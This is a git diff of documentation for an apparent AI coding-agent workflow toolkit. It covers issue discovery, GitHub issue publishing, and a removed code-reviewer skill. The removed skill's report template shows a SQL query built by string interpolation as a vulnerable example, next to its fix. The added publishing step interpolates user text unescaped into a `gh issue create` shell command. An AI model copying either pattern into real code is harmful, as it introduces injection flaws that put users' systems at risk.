{ label: "Export to Issues (Recommended)", description: `Export ${issues.length} issues for planning` },
|
||||
{ label: "Review Details", description: "View comparison analysis and iteration details" },
|
||||
{ label: "Run Deeper", description: "Continue with more iterations" },
|
||||
{ label: "Skip", description: "Complete without exporting" }
|
||||
]
|
||||
}]
|
||||
});
|
||||
```
|
||||
|
||||
## Output File Structure
|
||||
|
||||
```
|
||||
.workflow/issues/discoveries/
|
||||
└── {DBP-YYYYMMDD-HHmmss}/
|
||||
├── discovery-state.json # Session state with iteration tracking
|
||||
├── iterations/
|
||||
│ ├── 1/
|
||||
│ │ └── {dimension}.json # Dimension findings
|
||||
│ ├── 2/
|
||||
│ │ └── {dimension}.json
|
||||
│ └── ...
|
||||
├── comparison-analysis.json # Cross-dimension comparison (if applicable)
|
||||
└── discovery-issues.jsonl # Generated issue candidates
|
||||
```
|
||||
|
||||
**Simplified Design**:
|
||||
- ACE context and Gemini plan kept in memory, not persisted
|
||||
- Iteration summaries embedded in state
|
||||
- No separate summary.md (state.json contains all needed info)
|
||||
|
||||
## Schema References
|
||||
|
||||
| Schema | Path | Used By |
|
||||
|--------|------|---------|
|
||||
| **Discovery State** | `discovery-state-schema.json` | Orchestrator (state tracking) |
|
||||
| **Discovery Finding** | `discovery-finding-schema.json` | Dimension agents (output) |
|
||||
| **Exploration Plan** | `exploration-plan-schema.json` | Gemini output validation (memory only) |
|
||||
|
||||
## Configuration Options
|
||||
|
||||
| Flag | Default | Description |
|
||||
|------|---------|-------------|
|
||||
| `--scope` | `**/*` | File pattern to explore |
|
||||
| `--depth` | `standard` | `standard` (3 iterations) or `deep` (5+ iterations) |
|
||||
| `--max-iterations` | 5 | Maximum exploration iterations |
|
||||
| `--tool` | `gemini` | Planning tool (gemini/qwen) |
|
||||
| `--plan-only` | `false` | Stop after Phase 2 (Gemini planning), show plan for user review |
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Single Module Deep Dive
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Find all potential issues in the auth module" --scope=src/auth/**
|
||||
```
|
||||
|
||||
**Gemini plans** (single dimension):
|
||||
- Dimension: auth-module
|
||||
- Focus: security vulnerabilities, edge cases, error handling, test gaps
|
||||
|
||||
**Iterations**: 2-3 (until no new findings)
|
||||
|
||||
### Example 2: API Contract Comparison
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Check if API calls match implementations" --scope=src/**
|
||||
```
|
||||
|
||||
**Gemini plans** (comparison):
|
||||
- Dimension 1: api-consumers (fetch calls, hooks, services)
|
||||
- Dimension 2: api-providers (handlers, routes, controllers)
|
||||
- Comparison matrix: endpoints, methods, payloads, responses
|
||||
|
||||
### Example 3: Multi-Module Audit
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Audit the payment flow for issues" --scope=src/payment/**
|
||||
```
|
||||
|
||||
**Gemini plans** (multi-dimension):
|
||||
- Dimension 1: payment-logic (calculations, state transitions)
|
||||
- Dimension 2: validation (input checks, business rules)
|
||||
- Dimension 3: error-handling (failure modes, recovery)
|
||||
|
||||
### Example 4: Plan Only Mode
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Find inconsistent patterns" --plan-only
|
||||
```
|
||||
|
||||
Stops after Gemini planning, outputs:
|
||||
```
|
||||
Gemini Plan:
|
||||
- Intent: search
|
||||
- Dimensions: 2 (pattern-definitions, pattern-usages)
|
||||
- Estimated iterations: 3
|
||||
|
||||
Continue with exploration? [Y/n]
|
||||
```
|
||||
|
||||
## Related Commands
|
||||
|
||||
```bash
|
||||
# After discovery, plan solutions
|
||||
/issue:plan DBP-001-01,DBP-001-02
|
||||
|
||||
# View all discoveries
|
||||
/issue:manage
|
||||
|
||||
# Standard perspective-based discovery
|
||||
/issue:discover src/auth/** --perspectives=security,bug
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Be Specific in Prompts**: More specific prompts lead to better Gemini planning
|
||||
2. **Scope Appropriately**: Narrow scope for focused comparison, wider for audits
|
||||
3. **Review Exploration Plan**: Check `exploration-plan.json` before long explorations
|
||||
4. **Use Standard Depth First**: Start with standard, go deep only if needed
|
||||
5. **Combine with `/issue:discover`**: Use prompt-based for comparisons, perspective-based for audits
|
||||
@@ -29,6 +29,10 @@ interface Issue {
|
||||
source_url?: string;
|
||||
labels?: string[];
|
||||
|
||||
// GitHub binding (for non-GitHub sources that publish to GitHub)
|
||||
github_url?: string; // https://github.com/owner/repo/issues/123
|
||||
github_number?: number; // 123
|
||||
|
||||
// Optional structured fields
|
||||
expected_behavior?: string;
|
||||
actual_behavior?: string;
|
||||
@@ -165,7 +169,30 @@ if (clarityScore < 2 && (!issueData.context || issueData.context.length < 20)) {
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 5: Create Issue
|
||||
### Phase 5: GitHub Publishing Decision (Non-GitHub Sources)
|
||||
|
||||
```javascript
|
||||
// For non-GitHub sources, ask if user wants to publish to GitHub
|
||||
let publishToGitHub = false;
|
||||
|
||||
if (issueData.source !== 'github') {
|
||||
const publishAnswer = AskUserQuestion({
|
||||
questions: [{
|
||||
question: 'Would you like to publish this issue to GitHub?',
|
||||
header: 'Publish',
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: 'Yes, publish to GitHub', description: 'Create issue on GitHub and link it' },
|
||||
{ label: 'No, keep local only', description: 'Store as local issue without GitHub sync' }
|
||||
]
|
||||
}]
|
||||
});
|
||||
|
||||
publishToGitHub = publishAnswer.answers?.['Publish']?.includes('Yes');
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 6: Create Issue
|
||||
|
||||
**Summary Display:**
|
||||
- Show ID, title, source, affected files (if any)
|
||||
@@ -220,8 +247,64 @@ EOF
|
||||
}
|
||||
```
|
||||
|
||||
**GitHub Publishing** (if user opted in):
|
||||
```javascript
|
||||
// Step 1: Create local issue FIRST
|
||||
const localIssue = createLocalIssue(issueData); // ccw issue create
|
||||
|
||||
// Step 2: Publish to GitHub if requested
|
||||
if (publishToGitHub) {
|
||||
const ghResult = Bash(`gh issue create --title "${issueData.title}" --body "${issueData.context}"`);
|
||||
// Parse GitHub URL from output
|
||||
const ghUrl = ghResult.match(/https:\/\/github\.com\/[\w-]+\/[\w-]+\/issues\/\d+/)?.[0];
|
||||
const ghNumber = parseInt(ghUrl?.match(/\/issues\/(\d+)/)?.[1]);
|
||||
|
||||
if (ghNumber) {
|
||||
// Step 3: Update local issue with GitHub binding
|
||||
Bash(`ccw issue update ${localIssue.id} --github-url "${ghUrl}" --github-number ${ghNumber}`);
|
||||
// Or via pipe:
|
||||
// echo '{"github_url":"${ghUrl}","github_number":${ghNumber}}' | ccw issue update ${localIssue.id}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Workflow:**
|
||||
```
|
||||
1. Create local issue (ISS-YYYYMMDD-NNN) → stored in .workflow/issues.jsonl
|
||||
2. If publishToGitHub:
|
||||
a. gh issue create → returns GitHub URL
|
||||
b. Update local issue with github_url + github_number binding
|
||||
3. Both local and GitHub issues exist, linked together
|
||||
```
|
||||
|
||||
**Example with GitHub Publishing:**
|
||||
```bash
|
||||
# User creates text issue
|
||||
/issue:new "Login fails with special chars. Expected: success. Actual: 500"
|
||||
|
||||
# System asks: "Would you like to publish this issue to GitHub?"
|
||||
# User selects: "Yes, publish to GitHub"
|
||||
|
||||
# Output:
|
||||
# ✓ Local issue created: ISS-20251229-001
|
||||
# ✓ Published to GitHub: https://github.com/org/repo/issues/123
|
||||
# ✓ GitHub binding saved to local issue
|
||||
# → Next step: /issue:plan ISS-20251229-001
|
||||
|
||||
# Resulting issue JSON:
|
||||
{
|
||||
"id": "ISS-20251229-001",
|
||||
"title": "Login fails with special chars",
|
||||
"source": "text",
|
||||
"github_url": "https://github.com/org/repo/issues/123",
|
||||
"github_number": 123,
|
||||
...
|
||||
}
|
||||
```
|
||||
|
||||
**Completion:**
|
||||
- Display created issue ID
|
||||
- Show GitHub URL (if published)
|
||||
- Show next step: `/issue:plan <id>`
|
||||
|
||||
## Execution Flow
|
||||
@@ -240,9 +323,16 @@ Phase 2: Data Extraction (branched by clarity)
|
||||
│ │ (3 files max) │ → feedback │
|
||||
└────────────┴─────────────────┴──────────────┘
|
||||
|
||||
Phase 3: Create Issue
|
||||
Phase 3: GitHub Publishing Decision (non-GitHub only)
|
||||
├─ Source = github: Skip (already from GitHub)
|
||||
└─ Source ≠ github: AskUserQuestion
|
||||
├─ Yes → publishToGitHub = true
|
||||
└─ No → publishToGitHub = false
|
||||
|
||||
Phase 4: Create Issue
|
||||
├─ Score ≥ 2: Direct creation
|
||||
└─ Score < 2: Confirm first → Create
|
||||
└─ If publishToGitHub: gh issue create → link URL
|
||||
|
||||
Note: Deep exploration & lifecycle deferred to /issue:plan
|
||||
```
|
||||
|
||||
@@ -198,11 +198,12 @@ ${issueList}
|
||||
2. Load project context files
|
||||
3. Explore codebase (ACE semantic search)
|
||||
4. Plan solution with tasks (schema: solution-schema.json)
|
||||
5. Write solution to: .workflow/issues/solutions/{issue-id}.jsonl
|
||||
6. Single solution → auto-bind; Multiple → return for selection
|
||||
5. **If github_url exists**: Add final task to comment on GitHub issue
|
||||
6. Write solution to: .workflow/issues/solutions/{issue-id}.jsonl
|
||||
7. Single solution → auto-bind; Multiple → return for selection
|
||||
|
||||
### Rules
|
||||
- Solution ID format: SOL-{issue-id}-{seq}
|
||||
- Solution ID format: SOL-{issue-id}-{uid} (uid: 4 random alphanumeric chars, e.g., a7x9)
|
||||
- Single solution per issue → auto-bind via ccw issue bind
|
||||
- Multiple solutions → register only, return pending_selection
|
||||
- Tasks must have quantified acceptance.criteria
|
||||
|
||||
@@ -1,340 +0,0 @@
|
||||
# Code Reviewer Skill
|
||||
|
||||
A comprehensive code review skill for identifying security vulnerabilities and best practices violations.
|
||||
|
||||
## Overview
|
||||
|
||||
The **code-reviewer** skill provides automated code review capabilities covering:
|
||||
- **Security Analysis**: OWASP Top 10, CWE Top 25, language-specific vulnerabilities
|
||||
- **Code Quality**: Naming conventions, complexity, duplication, dead code
|
||||
- **Performance**: N+1 queries, inefficient algorithms, memory leaks
|
||||
- **Maintainability**: Documentation, test coverage, dependency health
|
||||
|
||||
## Quick Start
|
||||
|
||||
### Basic Usage
|
||||
|
||||
```bash
|
||||
# Review entire codebase
|
||||
/code-reviewer
|
||||
|
||||
# Review specific directory
|
||||
/code-reviewer --scope src/auth
|
||||
|
||||
# Focus on security only
|
||||
/code-reviewer --focus security
|
||||
|
||||
# Focus on best practices only
|
||||
/code-reviewer --focus best-practices
|
||||
```
|
||||
|
||||
### Advanced Options
|
||||
|
||||
```bash
|
||||
# Review with custom severity threshold
|
||||
/code-reviewer --severity critical,high
|
||||
|
||||
# Review specific file types
|
||||
/code-reviewer --languages typescript,python
|
||||
|
||||
# Generate detailed report
|
||||
/code-reviewer --report-level detailed
|
||||
|
||||
# Resume from previous session
|
||||
/code-reviewer --resume
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
### Security Analysis
|
||||
|
||||
✅ **OWASP Top 10 2021 Coverage**
|
||||
- Injection vulnerabilities (SQL, Command, XSS)
|
||||
- Authentication & authorization flaws
|
||||
- Sensitive data exposure
|
||||
- Security misconfiguration
|
||||
- And more...
|
||||
|
||||
✅ **CWE Top 25 Coverage**
|
||||
- Cross-site scripting (CWE-79)
|
||||
- SQL injection (CWE-89)
|
||||
- Command injection (CWE-78)
|
||||
- Input validation (CWE-20)
|
||||
- And more...
|
||||
|
||||
✅ **Language-Specific Checks**
|
||||
- JavaScript/TypeScript: prototype pollution, eval usage
|
||||
- Python: pickle vulnerabilities, command injection
|
||||
- Java: deserialization, XXE
|
||||
- Go: race conditions, memory leaks
|
||||
|
||||
### Best Practices Review
|
||||
|
||||
✅ **Code Quality**
|
||||
- Naming convention compliance
|
||||
- Cyclomatic complexity analysis
|
||||
- Code duplication detection
|
||||
- Dead code identification
|
||||
|
||||
✅ **Performance**
|
||||
- N+1 query detection
|
||||
- Inefficient algorithm patterns
|
||||
- Memory leak detection
|
||||
- Resource cleanup verification
|
||||
|
||||
✅ **Maintainability**
|
||||
- Documentation coverage
|
||||
- Test coverage analysis
|
||||
- Dependency health check
|
||||
- Error handling review
|
||||
|
||||
## Output
|
||||
|
||||
The skill generates comprehensive reports in `.code-review/` directory:
|
||||
|
||||
```
|
||||
.code-review/
|
||||
├── inventory.json # File inventory with metadata
|
||||
├── security-findings.json # Security vulnerabilities
|
||||
├── best-practices-findings.json # Best practices violations
|
||||
├── summary.json # Summary statistics
|
||||
├── REPORT.md # Comprehensive markdown report
|
||||
└── FIX-CHECKLIST.md # Actionable fix checklist
|
||||
```
|
||||
|
||||
### Report Contents
|
||||
|
||||
**REPORT.md** includes:
|
||||
- Executive summary with risk assessment
|
||||
- Quality scores (Security, Code Quality, Performance, Maintainability)
|
||||
- Detailed findings organized by severity
|
||||
- Code examples with fix recommendations
|
||||
- Action plan prioritized by urgency
|
||||
- Compliance status (PCI DSS, HIPAA, GDPR, SOC 2)
|
||||
|
||||
**FIX-CHECKLIST.md** provides:
|
||||
- Checklist format for tracking fixes
|
||||
- Organized by severity (Critical → Low)
|
||||
- Effort estimates for each issue
|
||||
- Priority assignments
|
||||
|
||||
## Configuration
|
||||
|
||||
Create `.code-reviewer.json` in project root:
|
||||
|
||||
```json
|
||||
{
|
||||
"scope": {
|
||||
"include": ["src/**/*", "lib/**/*"],
|
||||
"exclude": ["**/*.test.ts", "**/*.spec.ts", "**/node_modules/**"]
|
||||
},
|
||||
"security": {
|
||||
"enabled": true,
|
||||
"checks": ["owasp-top-10", "cwe-top-25"],
|
||||
"severity_threshold": "medium"
|
||||
},
|
||||
"best_practices": {
|
||||
"enabled": true,
|
||||
"code_quality": true,
|
||||
"performance": true,
|
||||
"maintainability": true
|
||||
},
|
||||
"reporting": {
|
||||
"format": "markdown",
|
||||
"output_path": ".code-review/",
|
||||
"include_snippets": true,
|
||||
"include_fixes": true
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Workflow
|
||||
|
||||
### Phase 1: Code Discovery
|
||||
- Discover and categorize code files
|
||||
- Extract metadata (LOC, complexity, framework)
|
||||
- Prioritize files (Critical, High, Medium, Low)
|
||||
|
||||
### Phase 2: Security Analysis
|
||||
- Scan for OWASP Top 10 vulnerabilities
|
||||
- Check CWE Top 25 weaknesses
|
||||
- Apply language-specific security patterns
|
||||
- Generate security findings
|
||||
|
||||
### Phase 3: Best Practices Review
|
||||
- Analyze code quality issues
|
||||
- Detect performance problems
|
||||
- Assess maintainability concerns
|
||||
- Generate best practices findings
|
||||
|
||||
### Phase 4: Report Generation
|
||||
- Consolidate all findings
|
||||
- Calculate quality scores
|
||||
- Generate comprehensive reports
|
||||
- Create actionable checklists
|
||||
|
||||
## Integration
|
||||
|
||||
### Pre-commit Hook
|
||||
|
||||
Block commits with critical/high issues:
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
# .git/hooks/pre-commit
|
||||
|
||||
staged_files=$(git diff --cached --name-only --diff-filter=ACMR)
|
||||
ccw run code-reviewer --scope "$staged_files" --severity critical,high
|
||||
|
||||
if [ $? -ne 0 ]; then
|
||||
echo "❌ Code review found critical/high issues. Commit aborted."
|
||||
exit 1
|
||||
fi
|
||||
```
|
||||
|
||||
### CI/CD Integration
|
||||
|
||||
```yaml
|
||||
# .github/workflows/code-review.yml
|
||||
name: Code Review
|
||||
on: [pull_request]
|
||||
|
||||
jobs:
|
||||
review:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run Code Review
|
||||
run: |
|
||||
ccw run code-reviewer --report-level detailed
|
||||
ccw report upload .code-review/report.md
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Security-Focused Review
|
||||
|
||||
```bash
|
||||
# Review authentication module for security issues
|
||||
/code-reviewer --scope src/auth --focus security --severity critical,high
|
||||
```
|
||||
|
||||
**Output**: Security findings with OWASP/CWE mappings and fix recommendations
|
||||
|
||||
### Example 2: Performance Review
|
||||
|
||||
```bash
|
||||
# Review API endpoints for performance issues
|
||||
/code-reviewer --scope src/api --focus best-practices --check performance
|
||||
```
|
||||
|
||||
**Output**: N+1 queries, inefficient algorithms, memory leak detections
|
||||
|
||||
### Example 3: Full Project Audit
|
||||
|
||||
```bash
|
||||
# Comprehensive review of entire codebase
|
||||
/code-reviewer --report-level detailed --output .code-review/audit-2024-01.md
|
||||
```
|
||||
|
||||
**Output**: Complete audit with all findings, scores, and action plan
|
||||
|
||||
## Compliance Support
|
||||
|
||||
The skill maps findings to compliance requirements:
|
||||
|
||||
- **PCI DSS**: Requirement 6.5 (Common coding vulnerabilities)
|
||||
- **HIPAA**: Technical safeguards and access controls
|
||||
- **GDPR**: Article 32 (Security of processing)
|
||||
- **SOC 2**: Security controls and monitoring
|
||||
|
||||
## Architecture
|
||||
|
||||
### Execution Mode
|
||||
**Sequential** - Fixed phase order for systematic review:
|
||||
1. Code Discovery → 2. Security Analysis → 3. Best Practices → 4. Report Generation
|
||||
|
||||
### Tools Used
|
||||
- `mcp__ace-tool__search_context` - Semantic code search
|
||||
- `mcp__ccw-tools__smart_search` - Pattern matching
|
||||
- `Read` - File content access
|
||||
- `Write` - Report generation
|
||||
|
||||
## Quality Standards
|
||||
|
||||
### Scoring System
|
||||
|
||||
```
|
||||
Overall Score = (
|
||||
Security Score × 0.4 +
|
||||
Code Quality Score × 0.25 +
|
||||
Performance Score × 0.2 +
|
||||
Maintainability Score × 0.15
|
||||
)
|
||||
```
|
||||
|
||||
### Score Ranges
|
||||
- **A (90-100)**: Excellent - Production ready
|
||||
- **B (80-89)**: Good - Minor improvements needed
|
||||
- **C (70-79)**: Acceptable - Some issues to address
|
||||
- **D (60-69)**: Poor - Significant improvements required
|
||||
- **F (0-59)**: Failing - Major issues, not production ready
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Large Codebase
|
||||
|
||||
If review takes too long:
|
||||
```bash
|
||||
# Review in batches
|
||||
/code-reviewer --scope src/module-1
|
||||
/code-reviewer --scope src/module-2 --resume
|
||||
|
||||
# Or use parallel execution
|
||||
/code-reviewer --parallel 4
|
||||
```
|
||||
|
||||
### False Positives
|
||||
|
||||
Configure suppressions in `.code-reviewer.json`:
|
||||
```json
|
||||
{
|
||||
"suppressions": {
|
||||
"security": {
|
||||
"sql-injection": {
|
||||
"paths": ["src/legacy/**/*"],
|
||||
"reason": "Legacy code, scheduled for refactor"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## File Structure
|
||||
|
||||
```
|
||||
.claude/skills/code-reviewer/
|
||||
├── SKILL.md # Main skill documentation
|
||||
├── README.md # This file
|
||||
├── phases/
|
||||
│ ├── 01-code-discovery.md
|
||||
│ ├── 02-security-analysis.md
|
||||
│ ├── 03-best-practices-review.md
|
||||
│ └── 04-report-generation.md
|
||||
├── specs/
|
||||
│ ├── security-requirements.md
|
||||
│ ├── best-practices-requirements.md
|
||||
│ └── quality-standards.md
|
||||
└── templates/
|
||||
├── security-finding.md
|
||||
├── best-practice-finding.md
|
||||
└── report-template.md
|
||||
```
|
||||
|
||||
## Version
|
||||
|
||||
**v1.0.0** - Initial release
|
||||
|
||||
## License
|
||||
|
||||
MIT License
|
||||
@@ -1,308 +0,0 @@
|
||||
---
|
||||
name: code-reviewer
|
||||
description: Comprehensive code review skill for identifying security vulnerabilities and best practices violations. Triggers on "code review", "review code", "security audit", "代码审查".
|
||||
allowed-tools: Read, Glob, Grep, mcp__ace-tool__search_context, mcp__ccw-tools__smart_search
|
||||
---
|
||||
|
||||
# Code Reviewer
|
||||
|
||||
Comprehensive code review skill for identifying security vulnerabilities and best practices violations.
|
||||
|
||||
## Architecture Overview
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Code Reviewer Workflow │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ │
|
||||
│ Phase 1: Code Discovery → 发现待审查的代码文件 │
|
||||
│ & Scoping - 根据语言/框架识别文件 │
|
||||
│ ↓ - 设置审查范围和优先级 │
|
||||
│ │
|
||||
│ Phase 2: Security → 安全漏洞扫描 │
|
||||
│ Analysis - OWASP Top 10 检查 │
|
||||
│ ↓ - 常见漏洞模式识别 │
|
||||
│ - 敏感数据泄露检查 │
|
||||
│ │
|
||||
│ Phase 3: Best Practices → 最佳实践审查 │
|
||||
│ Review - 代码质量检查 │
|
||||
│ ↓ - 性能优化建议 │
|
||||
│ - 可维护性评估 │
|
||||
│ │
|
||||
│ Phase 4: Report → 生成审查报告 │
|
||||
│ Generation - 按严重程度分类问题 │
|
||||
│ - 提供修复建议和示例 │
|
||||
│ - 生成可追踪的修复清单 │
|
||||
│ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
### Security Analysis
|
||||
|
||||
- **OWASP Top 10 Coverage**
|
||||
- Injection vulnerabilities (SQL, Command, LDAP)
|
||||
- Authentication & authorization bypass
|
||||
- Sensitive data exposure
|
||||
- XML External Entities (XXE)
|
||||
- Broken access control
|
||||
- Security misconfiguration
|
||||
- Cross-Site Scripting (XSS)
|
||||
- Insecure deserialization
|
||||
- Components with known vulnerabilities
|
||||
- Insufficient logging & monitoring
|
||||
|
||||
- **Language-Specific Checks**
|
||||
- JavaScript/TypeScript: prototype pollution, eval usage
|
||||
- Python: pickle vulnerabilities, command injection
|
||||
- Java: deserialization, path traversal
|
||||
- Go: race conditions, memory leaks
|
||||
|
||||
### Best Practices Review
|
||||
|
||||
- **Code Quality**
|
||||
- Naming conventions
|
||||
- Function complexity (cyclomatic complexity)
|
||||
- Code duplication
|
||||
- Dead code detection
|
||||
|
||||
- **Performance**
|
||||
- N+1 queries
|
||||
- Inefficient algorithms
|
||||
- Memory leaks
|
||||
- Resource cleanup
|
||||
|
||||
- **Maintainability**
|
||||
- Documentation quality
|
||||
- Test coverage
|
||||
- Error handling patterns
|
||||
- Dependency management
|
||||
|
||||
## Usage
|
||||
|
||||
### Basic Review
|
||||
|
||||
```bash
|
||||
# Review entire codebase
|
||||
/code-reviewer
|
||||
|
||||
# Review specific directory
|
||||
/code-reviewer --scope src/auth
|
||||
|
||||
# Focus on security only
|
||||
/code-reviewer --focus security
|
||||
|
||||
# Focus on best practices only
|
||||
/code-reviewer --focus best-practices
|
||||
```
|
||||
|
||||
### Advanced Options
|
||||
|
||||
```bash
|
||||
# Review with custom severity threshold
|
||||
/code-reviewer --severity critical,high
|
||||
|
||||
# Review specific file types
|
||||
/code-reviewer --languages typescript,python
|
||||
|
||||
# Generate detailed report with code snippets
|
||||
/code-reviewer --report-level detailed
|
||||
|
||||
# Resume from previous session
|
||||
/code-reviewer --resume
|
||||
```
|
||||
|
||||
## Configuration
|
||||
|
||||
Create `.code-reviewer.json` in project root:
|
||||
|
||||
```json
|
||||
{
|
||||
"scope": {
|
||||
"include": ["src/**/*", "lib/**/*"],
|
||||
"exclude": ["**/*.test.ts", "**/*.spec.ts", "**/node_modules/**"]
|
||||
},
|
||||
"security": {
|
||||
"enabled": true,
|
||||
"checks": ["owasp-top-10", "cwe-top-25"],
|
||||
"severity_threshold": "medium"
|
||||
},
|
||||
"best_practices": {
|
||||
"enabled": true,
|
||||
"code_quality": true,
|
||||
"performance": true,
|
||||
"maintainability": true
|
||||
},
|
||||
"reporting": {
|
||||
"format": "markdown",
|
||||
"output_path": ".code-review/",
|
||||
"include_snippets": true,
|
||||
"include_fixes": true
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### Review Report Structure
|
||||
|
||||
```markdown
|
||||
# Code Review Report
|
||||
|
||||
## Executive Summary
|
||||
- Total Issues: 42
|
||||
- Critical: 3
|
||||
- High: 8
|
||||
- Medium: 15
|
||||
- Low: 16
|
||||
|
||||
## Security Findings
|
||||
|
||||
### [CRITICAL] SQL Injection in User Query
|
||||
**File**: src/auth/user-service.ts:145
|
||||
**Issue**: Unsanitized user input in SQL query
|
||||
**Fix**: Use parameterized queries
|
||||
|
||||
Code Snippet:
|
||||
\`\`\`typescript
|
||||
// ❌ Vulnerable
|
||||
const query = `SELECT * FROM users WHERE username = '${username}'`;
|
||||
|
||||
// ✅ Fixed
|
||||
const query = 'SELECT * FROM users WHERE username = ?';
|
||||
db.execute(query, [username]);
|
||||
\`\`\`
|
||||
|
||||
## Best Practices Findings
|
||||
|
||||
### [MEDIUM] High Cyclomatic Complexity
|
||||
**File**: src/utils/validator.ts:78
|
||||
**Issue**: Function has complexity score of 15 (threshold: 10)
|
||||
**Fix**: Break into smaller functions
|
||||
|
||||
...
|
||||
```
|
||||
|
||||
## Phase Documentation
|
||||
|
||||
| Phase | Description | Output |
|
||||
|-------|-------------|--------|
|
||||
| [01-code-discovery.md](phases/01-code-discovery.md) | Discover and categorize code files | File inventory with metadata |
|
||||
| [02-security-analysis.md](phases/02-security-analysis.md) | Analyze security vulnerabilities | Security findings list |
|
||||
| [03-best-practices-review.md](phases/03-best-practices-review.md) | Review code quality and practices | Best practices findings |
|
||||
| [04-report-generation.md](phases/04-report-generation.md) | Generate comprehensive report | Markdown report |
|
||||
|
||||
## Specifications
|
||||
|
||||
- [specs/security-requirements.md](specs/security-requirements.md) - Security check specifications
|
||||
- [specs/best-practices-requirements.md](specs/best-practices-requirements.md) - Best practices standards
|
||||
- [specs/quality-standards.md](specs/quality-standards.md) - Overall quality standards
|
||||
- [specs/severity-classification.md](specs/severity-classification.md) - Issue severity criteria
|
||||
|
||||
## Templates
|
||||
|
||||
- [templates/security-finding.md](templates/security-finding.md) - Security finding template
|
||||
- [templates/best-practice-finding.md](templates/best-practice-finding.md) - Best practice finding template
|
||||
- [templates/report-template.md](templates/report-template.md) - Final report template
|
||||
|
||||
## Integration with Development Workflow
|
||||
|
||||
### Pre-commit Hook
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
# .git/hooks/pre-commit
|
||||
|
||||
# Run code review on staged files
|
||||
staged_files=$(git diff --cached --name-only --diff-filter=ACMR)
|
||||
ccw run code-reviewer --scope "$staged_files" --severity critical,high
|
||||
|
||||
if [ $? -ne 0 ]; then
|
||||
echo "❌ Code review found critical/high issues. Commit aborted."
|
||||
exit 1
|
||||
fi
|
||||
```
|
||||
|
||||
### CI/CD Integration
|
||||
|
||||
```yaml
|
||||
# .github/workflows/code-review.yml
|
||||
name: Code Review
|
||||
on: [pull_request]
|
||||
|
||||
jobs:
|
||||
review:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run Code Review
|
||||
run: |
|
||||
ccw run code-reviewer --report-level detailed
|
||||
ccw report upload .code-review/report.md
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Security-Focused Review
|
||||
|
||||
```bash
|
||||
# Review authentication module for security issues
|
||||
/code-reviewer --scope src/auth --focus security --severity critical,high
|
||||
```
|
||||
|
||||
### Example 2: Performance Review
|
||||
|
||||
```bash
|
||||
# Review API endpoints for performance issues
|
||||
/code-reviewer --scope src/api --focus best-practices --check performance
|
||||
```
|
||||
|
||||
### Example 3: Full Project Audit
|
||||
|
||||
```bash
|
||||
# Comprehensive review of entire codebase
|
||||
/code-reviewer --report-level detailed --output .code-review/audit-2024-01.md
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Large Codebase
|
||||
|
||||
If review takes too long:
|
||||
```bash
|
||||
# Review in batches
|
||||
/code-reviewer --scope src/module-1
|
||||
/code-reviewer --scope src/module-2 --resume
|
||||
|
||||
# Or use parallel execution
|
||||
/code-reviewer --parallel 4
|
||||
```
|
||||
|
||||
### False Positives
|
||||
|
||||
Configure suppressions in `.code-reviewer.json`:
|
||||
```json
|
||||
{
|
||||
"suppressions": {
|
||||
"security": {
|
||||
"sql-injection": {
|
||||
"paths": ["src/legacy/**/*"],
|
||||
"reason": "Legacy code, scheduled for refactor"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Roadmap
|
||||
|
||||
- [ ] AI-powered vulnerability detection
|
||||
- [ ] Integration with popular security scanners (Snyk, SonarQube)
|
||||
- [ ] Automated fix suggestions with diffs
|
||||
- [ ] IDE plugins for real-time feedback
|
||||
- [ ] Custom rule engine for organization-specific policies
|
||||
|
||||
## License
|
||||
|
||||
MIT License - See LICENSE file for details
|
||||
@@ -1,246 +0,0 @@
|
||||
# Phase 1: Code Discovery & Scoping
|
||||
|
||||
## Objective
|
||||
|
||||
Discover and categorize all code files within the specified scope, preparing them for security analysis and best practices review.
|
||||
|
||||
## Input
|
||||
|
||||
- **User Arguments**:
|
||||
- `--scope`: Directory or file patterns (default: entire project)
|
||||
- `--languages`: Specific languages to review (e.g., typescript, python, java)
|
||||
- `--exclude`: Patterns to exclude (e.g., test files, node_modules)
|
||||
|
||||
- **Configuration**: `.code-reviewer.json` (if exists)
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Load Configuration
|
||||
|
||||
```javascript
|
||||
// Check for project-level configuration
|
||||
const configPath = path.join(projectRoot, '.code-reviewer.json');
|
||||
const config = fileExists(configPath)
|
||||
? JSON.parse(readFile(configPath))
|
||||
: getDefaultConfig();
|
||||
|
||||
// Merge user arguments with config
|
||||
const scope = args.scope || config.scope.include;
|
||||
const exclude = args.exclude || config.scope.exclude;
|
||||
const languages = args.languages || config.languages || 'auto';
|
||||
```
|
||||
|
||||
### Step 2: Discover Files
|
||||
|
||||
Use MCP tools for efficient file discovery:
|
||||
|
||||
```javascript
|
||||
// Use smart_search for file discovery
|
||||
const files = await mcp__ccw_tools__smart_search({
|
||||
